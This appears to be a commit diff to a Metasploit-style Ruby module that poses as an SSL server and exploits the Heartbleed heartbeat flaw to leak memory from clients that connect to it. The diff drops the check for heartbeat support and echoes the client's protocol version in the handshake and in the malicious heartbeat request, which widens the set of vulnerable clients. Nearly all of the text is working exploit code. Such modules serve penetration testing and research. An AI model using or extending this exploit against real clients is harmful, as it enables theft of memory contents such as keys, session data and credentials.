@@ -16,7 +16,7 @@ def initialize
16
16
'Description' => %q{
17
17
This module provides a fake SSL service that is intended to
18
18
leak memory from client systems as they connect. This module is
19
- hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher.
19
+ hardcoded for using the AES-128-CBC-SHA1 cipher.
20
20
} ,
21
21
'Author' =>
22
22
[
@@ -160,19 +160,12 @@ def process_openssl_cleartext_request(c, data)
160
160
161
161
print_status ( "#{ @state [ c ] [ :name ] } Processing Client Hello..." )
162
162
163
- # Ignore clients that do not support heartbeat requests
164
- unless data . index ( "\x0F \x00 \x01 \x01 " )
165
- print_status ( "#{ @state [ c ] [ :name ] } Client does not support heartbeats" )
166
- c . close
167
- return
168
- end
169
-
170
163
# Extract the client_random needed to compute the master key
171
164
@state [ c ] [ :client_random ] = data [ 11 , 32 ]
172
165
@state [ c ] [ :received_hello ] = true
173
166
174
167
print_status ( "#{ @state [ c ] [ :name ] } Sending Server Hello..." )
175
- openssl_send_server_hello ( c , data )
168
+ openssl_send_server_hello ( c , data , message_version )
176
169
return
177
170
end
178
171
@@ -203,7 +196,7 @@ def process_openssl_cleartext_request(c, data)
203
196
else
204
197
# Send heartbeat requests
205
198
if @state [ c ] [ :heartbeats ] . length < heartbeat_limit
206
- openssl_send_heartbeat ( c )
199
+ openssl_send_heartbeat ( c , message_version )
207
200
end
208
201
209
202
# Process cleartext heartbeat replies
@@ -244,7 +237,7 @@ def process_openssl_encrypted_request(c, data)
244
237
245
238
# Send heartbeat requests
246
239
if @state [ c ] [ :heartbeats ] . length < heartbeat_limit
247
- openssl_send_heartbeat ( c )
240
+ openssl_send_heartbeat ( c , message_version )
248
241
end
249
242
250
243
# Process heartbeat replies
@@ -305,14 +298,14 @@ def on_client_close(c)
305
298
end
306
299
307
300
# Send an OpenSSL Server Hello response
308
- def openssl_send_server_hello ( c , hello )
301
+ def openssl_send_server_hello ( c , hello , version )
309
302
310
303
# Create the Server Hello response
311
304
extensions =
312
305
"\x00 \x0f \x00 \x01 \x01 " # Heartbeat
313
306
314
307
server_hello_payload =
315
- " \x03 \x02 " + # TLS Version 1.1
308
+ [ version ] . pack ( 'n' ) + # Use the protocol version sent by the client.
316
309
@state [ c ] [ :server_random ] + # Random (Timestamp + Random Bytes)
317
310
"\x00 " + # Session ID
318
311
"\x00 \x2F " + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA)
@@ -321,31 +314,31 @@ def openssl_send_server_hello(c, hello)
321
314
322
315
server_hello = [ 0x02 ] . pack ( "C" ) + [ server_hello_payload . length ] . pack ( "N" ) [ 1 , 3 ] + server_hello_payload
323
316
324
- msg1 = "\x16 \x03 \x02 " + [ server_hello . length ] . pack ( "n" ) + server_hello
317
+ msg1 = "\x16 " + [ version ] . pack ( 'n' ) + [ server_hello . length ] . pack ( "n" ) + server_hello
325
318
c . put ( msg1 )
326
319
327
320
# Skip the rest of TLS if we arent negotiating it
328
321
unless negotiate_tls?
329
322
# Send a heartbeat request to start the stream and return
330
- openssl_send_heartbeat ( c )
323
+ openssl_send_heartbeat ( c , version )
331
324
return
332
325
end
333
326
334
327
# Certificates
335
328
certs_combined = generate_certificates
336
329
pay2 = "\x0b " + [ certs_combined . length + 3 ] . pack ( "N" ) [ 1 , 3 ] + [ certs_combined . length ] . pack ( "N" ) [ 1 , 3 ] + certs_combined
337
- msg2 = "\x16 \x03 \x02 " + [ pay2 . length ] . pack ( "n" ) + pay2
330
+ msg2 = "\x16 " + [ version ] . pack ( 'n' ) + [ pay2 . length ] . pack ( "n" ) + pay2
338
331
c . put ( msg2 )
339
332
340
333
# End of Server Hello
341
334
pay3 = "\x0e \x00 \x00 \x00 "
342
- msg3 = "\x16 \x03 \x02 " + [ pay3 . length ] . pack ( "n" ) + pay3
335
+ msg3 = "\x16 " + [ version ] . pack ( 'n' ) + [ pay3 . length ] . pack ( "n" ) + pay3
343
336
c . put ( msg3 )
344
337
end
345
338
346
339
# Send the heartbeat request that results in memory exposure
347
- def openssl_send_heartbeat ( c )
348
- c . put "\x18 \x03 \x02 \x00 \x03 \x01 " + [ heartbeat_read_size ] . pack ( "n" )
340
+ def openssl_send_heartbeat ( c , version )
341
+ c . put "\x18 " + [ version ] . pack ( 'n' ) + " \x00 \x03 \x01 " + [ heartbeat_read_size ] . pack ( "n" )
349
342
end
350
343
351
344
# Pack the certificates for use in the TLS reply
0 commit comments